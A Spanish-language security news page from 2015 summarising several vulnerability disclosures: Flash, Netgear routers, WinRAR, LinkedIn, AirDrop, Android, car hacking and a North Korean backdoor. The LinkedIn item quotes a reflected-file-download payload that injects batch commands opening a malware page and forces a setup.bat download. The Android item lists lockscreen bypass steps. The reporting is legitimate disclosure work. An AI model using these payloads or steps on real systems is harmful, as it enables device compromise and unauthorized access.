Otra debilidad expone la clave de cifrado de datos por fugas de memoria RAM; en este ataque, los investigadores fueron capaces de leer los sectores de arranque que se suponía que están ocultos y calcular la clave.

Vulnerabilidad Zero-Day crítica en Adobe Flash activamente siendo explotada

Imágen: heyuguys

 A pesar de que tanto Microsoft y Adobe liberaron parches el pasado martes (13/10/2015), un fallo día cero crítico de flash permanece sin parchar en la última actualización de Adobe.

Una vulnerabilidad crítica de día cero permanece sin parchar en la última actualización de Adobe. Según Adobe APSA15-05, esta vulnerabilidad (CVE-2015-7645) permanece sin parchar y está siendo explotada públicamente. Adobe planea lanzar un parche que solucione esta vulnerabilidad en algún momento durante la semana del 19 de octubre.
Las versiones afectadas:

Adobe Flash Player 19.0.0.207 y versiones anteriores para Windows y Macintosh

 
Adobe Flash Player Extended Release Apoyo 18.0.0.252 y versiones anteriores 18.x

 
Adobe Flash Player 11.2.202.535 y anteriores versiones 11.x para Linux
Parches recientes resolver varias vulnerabilidades en las aplicaciones más populares


Adobe Reader y Acrobat: ~ 56 vulnerabilidades arregladas
Adobe Flash Player: ~ 13 vulnerabilidades
arregladas
Microsoft Windows, Office y otras aplicaciones: ~ 36 vulnerabilidades

arregladas
Número de vulnerabilidades críticas de Microsoft: 3
 Applicaciones con más problemas de seguridad reparadas: Internet Explorer (y Microsoft Edge)

Un archivo de avisos de seguridad de Microsoft, incluidas las publicadas el martes, se puede encontrar en la siguiente dirección.

Vulnerabilidad expuesta en Routers Netgear bajo ataque

Una vulnerabilidad en los routers Netgear, ya divulgada por dos grupos de investigadores de diferentes empresas de seguridad, ha sido explotada públicamente.


Netgear, por su parte, aún tiene que liberar el firmware parchado, a pesar de aparentemente haber construido un y confirmar con una de las empresas en privado que se solucionaba adecuadamente el problema.

Alexandre Herzog, director de tecnología de Compass Segurity Schweiz Ltd., de Suiza, dijo que la víctima no identificada se dio cuenta del ataque al investigar las razones detrás de cierta inestabilidad en su router. Descubrió que todas sus consultas DNS habían sido redirigidos al servidor del atacante. La víctima proporcionó a Compass la dirección IP de uno de los servidores de comando y control involucrados en el ataque. Herzog dijo que su compañía fue capaz de descargar datos desde el servidor del atacante y determinó que otros más de 10.000 routers ya habían sido explotados.

Herzog dijo que Compass informó a GovCERT nacional de Suiza, que dijo que ha comenzado la acción de apagar el servidor del atacante, contactar a Netgear sobre el nuevo firmware y contactar proveedores de servicios de Internet con el fin de arreglar los routers infectados; la mayor parte de las víctimas, dijo GovCERT, se encuentran en los Estados Unidos. Herzog dijo que GovCERT no ha tenido éxito en hablar con Netgear.

Daniel Haake de Compass descubrió y divulgó de forma privada las vulnerabilidades en julio; a finales de septiembre, los investigadores de Shellshock Labs también la descubrieron y dieron a conocer públicamente los defectos.

La vulnerabilidad es una derivación de la autenticación remota explotable que afecta firmware del router Netgear N300_1.1.0.31_1.0.1.img y N300-1.1.0.28_1.0.1.img. La falla permite a un atacante, sin saber la contraseña del router, acceder a la interfaz de administración.

"El único requisito previo para el ataque es que el atacante pueda llegar a la interfaz de administración web, que se puede llegar de forma predeterminada en la red interna", dijo Herzog. "Con la administración remota habilitada (no por defecto), el ataque sólo necesita ser conectado a Internet para explotar la falla. Un atacante con acceso físico al router puede sabotear de todos modos."

Con pleno acceso a la página de administración y configuración, un atacante podría hacer man-in-the-middle al tráfico de red, re-configurar los ajustes de DNS para redirigir el tráfico a un servidor de terceros, o degradar la comunicación SSL utilizando una serie de herramientas disponibles, como sslstrip desarrollado por Moxie Moulinsart.
Compass explica en su aviso de que un atacante sólo necesita hacer peticiones a una URL en particular varias veces después de que inicialmente no podía autenticarse en el router; finalmente iban a tener acceso a la interfaz de administración, sin pasar por un mensaje para introducir las credenciales.

De acuerdo con la línea de tiempo desde el descubrimiento, Netgear se notificó el 21 de julio a través de correo electrónico y 23 de julio a través de soporte de chat, que al día siguiente redirigió la notificación al equipo técnico de Netgear. A continuación, casi un mes después de la solicitud de una actualización de estado ignorada el 29 de julio, Compass puso a Netgear en aviso que revelaría detalles después de 90 días. El 3 de septiembre, Netgear envió a Compass un firmware beta para determinar si el problema había sido parchado adecuadamente, que Compass confirmó. Seis días más tarde, Netgear dijo a Compass que no quiso revelar una fecha de lanzamiento para el firmware actualizado. Mientras tanto, Shellshock labs hizo publica la falla el 29 de septiembre, lo que provocó que Compass hiciera lo mismo.

"Probablemente la parte más difícil es construir y enviar el nuevo firmware, y lograr que todos los clientes lo instalen", dijo Herzog. "La forma en que la autenticación funciona en el router parece muy complicada para nada, así que tal vez estoy subestimando el esfuerzo. Pero esto es más una cuestión de Netgear, que no ofrece ninguna justificación de sus retrasos ".

Hackers demuestran al departamento de Policía de EE.UU. que sus vehículos pueden ser hackeados


Los investigadores de seguridad Chris Valasek y Charlie Miller ayudaron al mundo a entender que los vehículos de último modelo son vulnerables a los ataques cibernéticos.
hackread.- Hemos leído sobre como computadoras de la policia son hackeadas o caen victimas de ransomware y todo eso, pero, ¿Se puede hackear sus autos? Eso es algo que no nos esperábamos.

Posterior a el asombroso escándalo de hack a Chrysler, ahora ha salido a la luz que la mayoría de los vehículos de la policía también son vulnerables a los ataques cibernéticos.

Miller y Valasek han detectado previamente vulnerabilidades en Ford Escape en 2013. Durante ese secuestro en particular, el dúo de la investigación lo estrelló contra las hierbas en un estacionamiento desocupado. Lograron secuestrar los sistemas de la patrulla de la policía estatal.

Este hack en específico se centra principalmente en los autos de policía estacionados. El hacker podría infiltrarse en los sistemas internos del vehículo y hacer que el operador del vehículo no pueda hacer el cambio de estar estacionado a conducir. Luego después pueden hacer que las RPM lleguen a su máximo acelerándolo, sin tener ningún pie en el pedal.

Luego trabajan sobre el sistema para asegurarse que el motor sea apagado.

El oficial practicamente queda atascados sin una manera de ir a ninguna parte - lo que les deja en situaciones potencialmente peligrosas para su vida. Pero no te preoccupes demasiado por las consecuencias del mundo real. Ford explicó que este truco se hizo bajo circunstancias extremas y llevado a cabo por profesionales.

Cosas como una incontrolable bocina o la manipulación de las pausas y velocidades de los automóviles, spoofing del sistema GPS, la manipulación de cuentakilómetros y velocímetro, así como comprometedores cambios de dirección fueron realizados mediante el envío de un conjunto de comandos.



En julio de 2015, un par de senadores estadounidenses, Edward Markey y Richard Blumenthal mostraron su preocupación por la seguridad de los vehículos, así como los controladores y pidieron mayor seguridad y protección a sobre los vehículos.

Dijeron que las vulnerabilidades como estas pueden poner a los conductores en una situación potencialmente mortal.

Ambos senadores aprobaron una ley conocida como "SPY Car Act", que permitiría a la Comisión Federal de Comercio (FTC) y la National Highway Traffic Safety Administración (NHTSA) garantizar la seguridad de los datos del vehículo, así como el conductor al volante .

Vulnerabilidad día cero en WinRAR expone millones de usuarios a hackers

El investigador de seguridad Mohammad Reza Espargham encontró una nueva falla de día cero que está amenazando millones de usuarios de la última versión de WinRAR.


WinRAR es un software ampliamente utilizado para comprimir/descomprimir archivos y carpetas, con una suma de más de 500 millones de instalaciones.

De acuerdo con el investigador de seguridad de Vulnerability-Lab Mohammad Reza Espargham, la última versión de WinRAR 5.21 para Windows OS es vulnerable a la ejecución remota de código (RCE).

 "Una vulnerabilidad de ejecución remota de código se ha descubierto en el software oficial v5.21 WinRAR SFX. La vulnerabilidad permite a los atacantes ejecutar código remoto específico no autorizado para comprometer un sistema de destino. El problema se encuentra en la función de 'Text and Icon' del modulo 'Text to display in SFX window'. Un atacante remoto es capaz de generar archivos comprimidos propios con payloads maliciosos para ejecutar códigos específicos y comprometer el sistema. Los atacantes guardan en la entrada del archivo sfx el código html malicioso. Así se ejecuta el código específico cuando un usuario o sistema objetivo está procesando para abrir el archivo comprimido. ", Afirma la descripción técnica prestada para la falla.

WinRAR SFX es un tipo específico de archivo comprimido ejecutable con capacidades de auto-extraer, el atacante puede explotar la falla para ejecutar código arbitrario cuando las víctimas abren un archivo SFX.

A continuación una prueba de concepto entregada por Espargham:


Un atacante puede desencadenar con éxito la vulnerabilidad con baja interacción del usuario, y poner en peligro el sistema, la red del sistema o el dispositivo.

"La explotación de la vulnerabilidad de ejecución de código requiere una interacción baja de usuario (abrir el archivo) aunque no tenga privilegios de sistema o siendo un usuario restringido. La explotación exitosa de la vulnerabilidad de ejecución remota de código del software WinRAR SFX expone al sistema, la red o dispositivo.", Continúa el reporte,

"La principal desventaja surge debido a que son archivos SFX, ya que empiezan a funcionar tan pronto como el usuario hace clic en ellos. Por lo tanto, los usuarios no pueden identificar y verificar si el archivo ejecutable comprimido es un módulo genuino o perjudicial de WinRAR SFX".

El experto destacó la ausencia de un parche y proporciona la siguiente sugerencia a los usuarios WinRAR:


  • Utilice un software de compresión alternativo
  • No haga clic en los archivos recibidos de fuentes desconocidas
  • Utilice métodos de autenticación estrictas para proteger el sistema

Vulnerabilidad de Descarga Reflejada encontrada en LinkedIn

El investigador de seguridad David sopas de WebSegura descubrió una vulnerabilidad de descarga reflejada en la popular red social para profesionales LinkedIn.


Él estaba analizando otro sitio web cuando descubrió la siguiente petición XHR en Google Inspector de LinkedIn:
https://www.linkedin.com/countserv/count/share?url=http://www.site_i_was_in.pt
Parece una simple petición hecha por los sitios web para contar cuántas acciones tiene su sitio en la red Linkedin.

Entonces sopas trató de modificar el parámetro de la petición, aquí su primer intento:

https://www.linkedin.com/countserv/count/share?url= "||calc|| 

y obtuvo la siguiente respuesta:

IN.Tags.Share.handleCount({“count”:0,”fCnt”:”0″,”fCntPlusOne”:”1″,”url”:”\”||calc||”});

Descubrió que el parámetro URL no se validó y se reflejo en el archivo JSON, luego trató de descargar el archivo y cambiarle el nombre a .bat para ejecutar la calculadora desde Windows.
Tenía que cambiar la ruta por lo que descargar un archivo batch y utilizo un comando diferente en Windows.

https://www.linkedin.com/countserv/count/share;setup.bat?url=”||start chrome websegura.net/malware.htm||
Se dio cuenta de que IE8 descarga automáticamente el archivo batch desde linkedin.com, asi que Sopas intentó lo mismo con otros navegadores, con el fin de hacer su prueba de descarga, hizo uso del atributo download en HTML5.

<div align="center"> 
<a href='https://www.linkedin.com/countserv/count/share;setup.bat?url="||start chrome websegura.net/malware.htm||' download="setup.bat" onclick="return false;">
<img src="http://damnlink.com/uploaded_images/godaddy_coupons_and_godaddy_promo_code_3187745288.png" border="0" />

¿Cómo puede un atacante explotar una vulnerabilidad de descarga reflejada?

Sopas describen el siguiente escenario de ataque:

El usuario malicioso envía un enlace a la víctima como lo haría con un CSRF o XSS (campañas de phishing, redes sociales, mensajería instantánea, mensajes, etc.)
La víctima hace clic en el enlace y confiando en la fuente (Linkedin) lo descarga
La víctima ejecuta el archivo y su equipo es comprometido
"Un usuario malintencionado podría incluso dar más credibilidad al sitio de descarga HTML5 si usa vulnerabilidades de redirecciones abiertas en sitios seguros como redirecciones abiertas en Google o incluso en Linkedin.", Escribió sopas en un blog.
Este tipo de ataque es muy insidioso porque las víctimas creen que un archivo se ofrece para su descarga desde el sitio web de confianza, en este caso, Linkedin, incluso si contiene un exploit malicioso que permite a un atacante comprometer su máquina.

Aquí la línea de tiempo para la falla LinkedIn proporcionada por Sopas:

05/11/2015 envió el informe al Linkedin
05/11/2015 LinkedIn no entendió la verdadera naturaleza del ataque
05/11/2015 Respondí con más información utilizando otros ataques RFD públicos y un documento de  Oren Hafif sobre RFD
13-05-2015 Linkedin me dijo que están trabajando en una solución
02/06/2015 Pedí una actualización
03/06/2015 Linkedin respondió que me darán una actualización pronto
01/07/2015 Pedí de nuevo por una actualización
09/09/2015 Linkedin respondió que habían arreglado el problema
18-09-2015 Revelación completa de la falla

GM tardo 5 años arreglando una vulnerabilidad de seguridad de auto

Le ha tomado a General Motors (GM) media década resolver una vulnerabilidad de seguridad en su sistema de gestión de auto OneStar, se ha revelado.


Los investigadores de seguridad de la Universidad de California en San Diego y la Universidad de Washington hicieron el descubrimiento en el 2010 mientras se probaba la seguridad de un Chevy Impala 2009, informó la revista Wired.

Sin embargo, los expertos decidieron no publicar sus hallazgos en un artículo y en su lugar optaron por notificar a los fabricantes de automóviles de América directamente justo lo que habían descubierto.

El equipo también informó a la Administración Nacional de Seguridad de Tráfico en Carreteras de la falla, que concluyeron dejaba a millones de vehículos en riesgo de ser atacados.

Esta vulnerabilidad significaba que un ciberdelincuente tenía la capacidad no sólo de acceso a los datos recogidos por el sistema informático del vehículo, pero la posibilidad de desactivar también sus frenos.

"Básicamente tuvimos el control completo del auto excepto el de dirección," Karl Koscher, uno de los investigadores de seguridad que ayudaron a identificar el defecto, le dijo a Wired.

"Ciertamente, habría sido mejor si hubiera sido arreglada antes."

Si bien la respuesta de GM puede ser vista como débil y descuidada, no es atípico - los investigadores estaban dispuestos a mostrar que este tipo de respuestas para resolver una vulnerabilidad no es un caso aislado.
Ellos argumentan que la industria del automóvil en general ha tardado en responder a las implicaciones de seguridad que vienen con los autos cada vez más computarizados y conectados en la web.

"Simplemente no tienen las capacidades que nosotros damos por hecho en el mundo de escritorio y servidor", explica Stefan Savage, profesor de Ciencias de la Computación e Ingeniería de la Universidad de California en San Diego y uno de los investigadores principales del proyecto dede hacking de autos.

"Es un poco triste que toda la industria no esta lista para hacer frente a esto en el momento, y que hoy, cinco años más tarde, todavía no hay un sistema de respuesta a incidentes y actualización universal para esto."

En noticias relacionadas, se reveló el mes pasado que los resultados de un estudio similar fueron impedidos de ser publicados por un juez del Tribunal Superior del Reino Unido durante un máximo de dos años.

En 2013, la Universidad de Birmingham en el Reino Unido y la Universidad de Radboud en los Países Bajos había tenido la intención de lanzar su papel en una vulnerabilidad que habían identificado en el Crypto transponder Megamos (que es ampliamente utilizado Audi, Fiat, Honda, Volkswagen y Volvo).

Sin embargo, en ese momento, el juez de la Audiencia estuvo de acuerdo con la afirmación de Volkswagen que el acceso público al informe revelaría detalles clave que podrían ser utilizados por los ciberdelincuentes con motivos maliciosos.

Un peligroso y silencioso ataque en AirDrop amenaza usuarios de Apple

Una nueva vulnerabilidad mal que afecta el servicio de AirDrop podría ser explotada por atacantes para infectar silenciosamente iPhones y Apple Macs.


Las versiones anteriores a la más reciente del sistema operativo de Apple, el nuevo iOS 9, se ven afectadas por una grave falla en AirDrop. Dicha vulnerabilidad podría ser explotada por hackers para tomar el control total de los dispositivos de Apple iPhone o Mac.


El fallo de seguridad ha sido revelada por el investigador de seguridad australiano Mark Dowd, AirDrop es un servicio exclusivo que permite la transferencia de documentos entre los equipos compatibles de Macintosh y dispositivos iOS.

El error de AirDrop permite que cualquier persona dentro del rango de un usuario instalar silenciosamente un malware en el dispositivo de Apple enviandole un archivo que provoca el reinicio del mismo. La vulnerabilidad afecta a las versiones de iOS que soportan Airdrop de iOS 7 en adelante, así como las versiones de Mac OS X de Yosemite en adelante.
El problema principal para los usuarios de Apple es que un atacante puede explotar el bug de Airdrop, incluso si la víctima rechaza el archivo enviado.

Después de reiniciar el dispositivo, el malware obtiene acceso al Springboard, el software de Apple para gestionar la pantalla de inicio de iOS, lo que permite a la aplicación maliciosa para hacerse pasar con los derechos concedidos a la aplicación falsa.

Estos derechos incluyen el acceso a:

Contactos
Cámara fotográfica
Localización
Mensajes
y muchos más…

Es evidente que al tener acceso a las características anteriores del teléfono, el atacante puede comprometer totalmente dispositivo de la víctima.

Te dejamos un video del error en AirDrop publicado por Dowd, el video muestra un ataque a un iPhone con iOS 8.4.1.



El error en AirDrop ha sido corregido en la última version, iOS 9 que viene con un mecanismo de sandbox implementado por Apple que bloquea a los atacantes la escritura de archivos en ubicaciones arbitrarias en el dispositivo a través del servicio AirDrop.

A la espera de un parche completo que solucione el problema, los usuarios de Apple instan a actualizar a iOS 9 y Mac OS X EI Capitán, que están en salida inminente.

Desbloquear dispositivos Android 5.x es muy fácil

El investigador de seguridad John Gordon ha encontrado una manera fácil de desbloquear los teléfonos inteligentes con Android 5.0 y 5.1 (Build LMY48M).


El investigador de seguridad John Gordon ha descubierto una manera muy sencilla de saltarse la función de bloqueo móvil implementado en los teléfonos inteligentes con Android 5.0 y 5.1 (Build LMY48M).

Mecanismos como contraseña, bloqueo por patrón y bloqueo por PIN son utilizados por casi todos los usuarios móviles para proteger su dispositivo contra el acceso físico no autorizado.

Gordon descubrió una vulnerabilidad que podría ser explotada para desbloquear un teléfono Android (5.0 build LMY48I) con pantalla bloqueada. La operación hace que se cuelgue la interfaz de usuario de la pantalla de la contraseña y abre las puertas del dispositivo.

La vulnerabilidad apodada como "vulnerabilidad de elevación de privilegios en Lockscreen" se ha identificado con el CVE-2015-3860.
A continuación los pasos para desbloquear la pantalla al forzar que se cuelgue la aplicación de la cámara.

  • Toma el dispositivo y abre la pantalla del marcador de emergencia.
  • Escriba una larga cadena de números o caracteres especiales en el campo de entrada y copia y pega una cadena larga de forma continua hasta que no acepte más.
  • Ahora, copiar esa gran cadena.
  • Abre la aplicación de la cámara accesible sin contraseña.
  • Arrastre la barra de notificaciones y pulse el icono de configuración, que te mostrará un mensaje para desbloquear.
  • Ahora, pega la cadena copiada anteriormente continuamente en el campo de entrada de la contraseña, para crear una cadena aún más grande.
  • Vuelve a la cámara y haz clic en las imágenes o aumentar/disminuir el volumen mientras simultáneamente tocando el campo de introducción de la contraseña que contiene la gran cadena en caracteres en muchos lugares.
  • El usuario de Android se dará cuenta de los botones blandos (Home  y botón de Atrás) en la parte inferior de la pantalla desaparecerán cuando la aplicación de la cámara va a dejar de responder. De repente, la aplicación se cuelga y lleva al usuario a la pantalla de inicio del dispositivo.
Aquí un clip que muestra la falla:

Corea del Norte explota vulnerabilidades dia cero en el Procesador de textos principal de Corea del Sur

FireEye sospecha que Corea del Norte es responsable de una serie de ataques contra Corea del Sur que dependen de una vulnerabilidad dia cero en el procesador de textos más popular del Sur.


Los expertos en seguridad de FireEye especulan que Corea del Norte ha llevado a cabo ataques cibernéticos contra entidades de Corea del Sur mediante la explotación de una vulnerabilidad día cero (CVE-2.015-6585) en un programa de procesamiento de texto ampliamente utilizado en ese país, el procesador de texto Hangul.

De acuerdo con un informe publicado por FireEye, el procesador de texto Hangul es un software propietario utilizado principalmente por el gobierno y las instituciones públicas en Corea del Sur, por esta razón, Corea del Norte supuestamente explotó el vector de ataque.

La CVE-2015-6585 se arreglo hace unos días por el desarrollador del procesador de texto Hangul, Hancom.


Los expertos de FireEye han advertido que la atribución es definitiva, pero la circunstancia, el escenario de ataque y el objetivo elegido para dirigir la amenaza apunta a la investigación a creer que Corea del Norte está detrás de los ataques cibernéticos.

"Aunque no es concluyente, la focalización de un software de procesamiento de textos de propiedad de Corea del Sur sugiere fuertemente un interés específico en los objetivos de Corea del Sur, y con base en las similitudes de código y la superposición de infraestructura, la inteligencia de FireEye evalúa que esta actividad puede asociarse con actores de amenazas basadas en Corea del Norte . ", afirma el informe publicado por FireEye.
Los investigadores explicaron que una vez que una instancia maliciosa del procesador de textos Hangul se abre por las víctimas, se instala una puerta trasera en el blanco. FireEye apodo HANGMAN a esta puerta trasera, puesto que implementa funcionalidades comunes a dicha categoría de malware.

"Todos los documentos HWPX maliciosos instalan copias similares de un backdoor que llamamos HANGMAN. HANGMAN es capaz de cargar y descargar archivos, procesos y gestión del sistema de archivos, recopilar información del sistema, y ​​actualizar su configuración. La puerta trasera también encapsula su protocolo de comunicación con SSL. HANGMAN comienza comunicaciones mediante el envío de un handshake SSL legítimo a su servidor de mando y control (C2). Luego continúa comunicandose mediante mensajes de cabecera SSL, pero el payload del mensaje es un protocolo binario personalizado. "Continúa el informe.

Al analizar el código de la puerta trasera de HANGMAN los investigadores descubrieron la presencia de direcciones IP no modificables que pertenecen a la infraestructura de comando y control, estas direcciones IP se han relacionado con otros ataques sospechosos relacionados con Corea del Norte.

HANGMAN presenta varias similitudes con otra puerta trasera descubierta por FireEye apodada Peachpit, que se atribuyó por los expertos a Corea del Norte.

"Las variantes de HANGMAN esparcidas por los documentos HWPX utilizan funciones que son muy similares a las observadas en otras familias de malware utilizadas por presuntos actores basados ​​en Corea del Norte, como la puerta de atrás que llamamos Peachpit. Tanto Peachpit y HANGMAN incorporan una función donde se transmiten los comandos de Windows a la puerta trasera del servidor C2 remoto. ", Señala el informe.
Siguenos:
¿Usas Feedly? Suscribete:
follow us in feedly
Anuncios
Lo Más Popular